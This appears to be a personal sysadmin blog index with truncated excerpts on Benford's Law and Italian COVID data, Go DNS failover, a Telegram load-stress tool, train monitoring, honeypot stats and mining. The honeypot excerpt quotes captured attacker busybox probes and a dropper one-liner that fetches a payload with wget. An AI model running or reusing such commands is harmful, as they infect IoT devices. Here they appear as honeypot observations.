Testing Benford's Law on COVID-19 italian Datasets

  Since COVID-19 is the year most hot topic i decided that might be a good idea to test my newly created experiment with Go in order to check the Benford Law on public datasets. So first of all what is the Benford's Law?   According to online resources the Benford’s law (also called the first digit law) states  that the leading digits in a collection of data sets are probably going to be small.   In a nutshell, if we have a dataset containing numbers we will most likely find numbers starting with 1,2,3,4,5 since these will cover almost 75% of the number distribution (e.g. starting with 1 - 31% , 2 17% etc..)     The experiment My little experiment starts with the COVID-19 Dataset in order to see if those data are considered Benford's Law "Compliant". The dataset is populated by COVID-19 cases on a daily basis around 17-18 PM CET from the italian govt's "Protezione Civile", if you are interested into this data you can find it here: - https://gith

Automatic failover using Interlock + CI/CD(s)

  In the last few weeks in the middle of the lockdown i was bored and i (re)started playing around Go since i was a bit rusty. My main goal was to automagically failover all my static sites from Github & other public hosting sites back and forth in order to maintain an active DR plan when one of my providers is going offline because of connectivity or any other outage/maintenance. So before going into the blog post here is a quick overview: You can check it also on the readme there: When i started writing the code this time i tried to force myself to avoid the bad and ugly "exec shell" in order to be able to create a more thin Golang docker image (260MiB) So to avoid making you read all the i could sum up all the code in this sentence: "Interlock is a DNS failover and management tool based on Cloudflare APIs" Maybe i reinvented the wheel because i could have used (paid) the built-in health check of C
  Today i finally decided to opensource some of my code created to reach my maximum level of laziness, Automatically loadstressing web infrastructures via Telegram. The other challenge was to see/prove if Golang can be a replacement/alternative for Python scripting. Repo: Here is the diagram to better explain what i wanted to do: Disclaimer before i even start I'm not responsible for anything you do with this tool, this was made only for legit web loadstressing/benchmarking YOUR OWN infra. I know that most of the code can be written more efficiently/well, don't hate on my exec_shell() ahah end of disclaimer The main "ingredients" are: Ansible Golang Telegram At least one cloud provider with some resources It all starts from the Telegram Bot that keeps listening commands from the allowed "chat_id" configured and whenever a predefined command is sent the bot (Written in Golang) runs the Ansible playbook with e

Monitoring trains the sysadmin way

After discovering that the site and kindly offers some API to their train data i decided to implement my own monitoring system to get a complete overview of what is happening in the public train system and never miss a train. Master Plan: Scrape all data available (Train departure/arrival,delays,stations....) Standardize the format so i can implement pluggable systems (Grafana, Telegram Bot, Website, Twitter..) At least have fun when i hear "We are sorry for the inconvenience" while i check my systems Scraping all the relevant datasets All the data is collected with a script every 30 minutes using as input the site APIs and station lists, the ouput will be saved into InfluxDB (Legit, delay time tracking with timeseries DBs) and a local folder for historical data that i will use later with git. Standardize format To allow multiple systems communicate together you always need to take raw data (train datasets) and standardize it into

Some (fun) stats from a running Telnet honeypot (YAFH)

 Telnet sessions:   netstat -peanut | grep 23 | grep ESTABLISHED | wc -l 185   Total connection received last month: grep CONNECTION yafh-telnet.log | wc -l 644 Most common wget/busybox attempt ( Don't run it ...i implemented accidental copy-pasta protection here #): #/bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\x0181c46036\x7f'; /bin/busybox printf '\00281c46036\177'; /bin/echo -ne '\x0381c46036\x7f'; /usr/bin/printf '\00481c46036\177'; Top 15 password used (The honeypot was designed to allow any password access): <empty> 1234 password admin 12345 1234 Win1doW$ user pass aquario (??Really??) admin 888888 7ujMko0admin 666666 5up 54321 1234567890 123456 1111 12345 One-liner of the year goes to: cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin wget;wget http://1

Setting up your first Mining rig on Ubuntu

  Since a few months i started getting more and more interested in crypto and now i can share my experience with Mining. At the very beginning of Mining many were attracted by Bitcoin since the difficulty was so low that everyone with some spare GPUs could start and be an active node of the Bitcoin network and earn some satoshi (that was one of the reasons i started) but...  Nowadays this is still a thing but the miners have evolved and investors came into the game with huge datacenters full of ASICs/13 GPU rigs dedicated to mining a single coin and boosting the difficulty to the very top causing low budget miners to shut-off their rigs since you cannot make any profits with just a bunch of GPUs. What happened next?  Different coins started becoming profitable and allowing more GPU owners to jump into the mining game using another cryptocurrency like Ethereum, Zcash, Ethereum Classic, Monero.. and many others, if you ever noticed GPU prices this summer you probably saw tha